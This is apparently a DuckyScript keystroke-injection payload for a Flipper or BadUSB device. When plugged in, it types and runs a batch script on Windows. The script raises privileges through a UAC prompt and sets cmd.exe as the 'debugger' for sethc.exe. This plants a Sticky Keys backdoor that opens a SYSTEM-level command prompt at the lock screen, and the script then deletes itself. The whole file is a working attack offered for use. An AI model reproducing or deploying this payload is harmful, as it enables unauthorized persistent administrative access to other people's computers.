100 lines
2.7 KiB
Plaintext
100 lines
2.7 KiB
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment,
|
|
REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr.
|
|
REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account.
|
|
REM Version: 1.0
|
|
REM Category: Remote_Access
|
|
REM plug in second USB in before the Flipper
|
|
DELAY 3000
|
|
CONTROL ESCAPE
|
|
DELAY 500
|
|
STRING notepad
|
|
DELAY 250
|
|
ENTER
|
|
DELAY 750
|
|
STRING @echo off
|
|
ENTER
|
|
STRING :init
|
|
ENTER
|
|
STRING setlocal DisableDelayedExpansion
|
|
ENTER
|
|
STRING set cmdInvoke=1
|
|
ENTER
|
|
STRING set winSysFolder=System32
|
|
ENTER
|
|
STRING set "batchPath=%~0"
|
|
ENTER
|
|
STRING for %%k in (%0) do set batchName=%%~nk
|
|
ENTER
|
|
STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
|
|
ENTER
|
|
STRING setlocal EnableDelayedExpansion
|
|
ENTER
|
|
STRING :checkPrivileges
|
|
ENTER
|
|
STRING NET FILE 1>NUL 2>NUL
|
|
ENTER
|
|
STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
|
|
ENTER
|
|
STRING :getPrivileges
|
|
ENTER
|
|
STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
|
|
ENTER
|
|
STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
|
|
ENTER
|
|
STRING echo args = "ELEV " >> "%TEMPVBS%"
|
|
ENTER
|
|
STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
|
|
ENTER
|
|
STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
|
|
ENTER
|
|
STRING echo Next>> "%TEMPVBS%"
|
|
ENTER
|
|
STRING if '%cmdInvoke%'=='1' goto InvokeCmd
|
|
ENTER
|
|
STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
|
|
ENTER
|
|
STRING goto ExecElevation
|
|
ENTER
|
|
STRING :InvokeCmd
|
|
ENTER
|
|
STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
|
|
ENTER
|
|
STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%"
|
|
ENTER
|
|
STRING :ExecElevation
|
|
ENTER
|
|
STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
|
|
ENTER
|
|
STRING exit /B
|
|
ENTER
|
|
STRING :gotPrivileges
|
|
ENTER
|
|
STRING setlocal & cd /d "%~dp0."
|
|
ENTER
|
|
STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
|
|
ENTER
|
|
STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
|
|
ENTER
|
|
STRING cls
|
|
ENTER
|
|
STRING echo Payload Install Failed
|
|
ENTER
|
|
STRING pause
|
|
ENTER
|
|
STRING :end
|
|
ENTER
|
|
STRING del /F /Q "%~0" && exit
|
|
CONTROL s
|
|
DELAY 500
|
|
STRING %temp%\run.bat
|
|
TAB
|
|
STRING a
|
|
ENTER
|
|
DELAY 250
|
|
ALT F4
|
|
DELAY 250
|
|
CONTROL ESCAPE
|
|
DELAY 500
|
|
STRING %temp%\run.bat
|
|
ENTER |